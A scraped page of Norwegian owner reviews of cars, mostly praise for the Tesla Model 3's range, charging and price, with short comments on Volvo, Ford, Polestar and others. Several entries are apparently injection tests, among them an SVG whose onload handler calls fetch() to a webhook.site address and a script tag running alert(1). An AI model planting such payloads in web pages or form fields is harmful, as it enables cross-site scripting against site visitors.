Vurdert av StigS
Tesla Model 3 (2025)
Ble fort vant med blinklysbryter og dørhåndtak. Noen passasjerer har klaget på baksetet på langkjøring. Alt i alt en utrolig bra bil til en lav pris.
Tesla Model 3 (2024)
Løp å kjøp. Ikke selg billig, denne bilen er verd hver krone. Takk bilgud
Tesla Model 3 (2024)
Luksusfølelse til god pris og overlegen rekkevidde og ladehastighet.
Tesla Model 3 (2024)
Mellomstor sportslig og energigjerrig. Oppleves romslig og praktisk.
Tesla Model 3 (2024)
WLTP er 678km på min med 18" proton felger. Rekkeviddeangst er et fremmedord. Highland (24-) er oppgradert med bedre støydemping, bedre fjæring, mer komfort og bedre skrudd sammen enn tidligere mod
Tesla Model 3 (2024)
På mange måter en bra bil. Dette er en moderne versjon av en Toyota Corolla hvor du får mye bil for pengene. Jeg skulle ønske de hadde laget understellet og bremser litt mer lekent selv om dette
Tesla Model 3 (2024)
Utrolig god å kjøre, lader over alt, lavt forbruk, god bygg kvalitet, lavt støynivå
Tesla Model 3 (2022)
Etter å ha eid bilen i ca. 2 år, er det svært vanskelig å peke på noe her. Performance Utgaven må være et av de beste bilene som er produsert noen gang! Den er vanvittig kvikk, som gjør den sv
Tesla Model 3 (2022)
Vi er veldig fornøyd. Lang rekkevidde, gøy bil å kjøre, enkel å få ladet bilen både i Norge og i Danmark. Smart bil!
Tesla Model 3 (2022)
Knuser alt.
Tesla Model 3 (2022)
Etter 17 fossilbiler (8 Saaber bla) og min nå tredje elbil er jeg fullstendig overbevist om at dette er Bil2.0 og bilen jeg skal kjøre resten av livet. Det har vært mye nytt å sette seg inn i, det
Tesla Model 3 (2022)
På elbilteknologi er Tesla best - punktum. Veldig effektiv - også når det er kald (dvs Vestlandet...), med pålitelig rekkeviddeindikator. Snittforbruk siden jeg fikk bilen i mars er 1.35 kwh/mil p
Tesla Model 3 (2022)
En veldig bra totalpakke. Fin pris, ekstremt gode ytelser, godt sammenskrudd. Tech-biten med app er milevis foran andre produsenter. Appen er virkelig fantastisk bra. Superladernettverket gir mer avsl
Tesla Model 3 (2021)
Kjempefornøyd - blir ny Tesla ved bytte!
Tesla Model 3 (2021)
I egen klasse. Ikke perfekt bil, men svært nær.
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat
MG ZS EV (2022)
Veldig godt fornøyd med bilen på alle måter tatt i betraktning at det var en forholdsvis rimelig bil.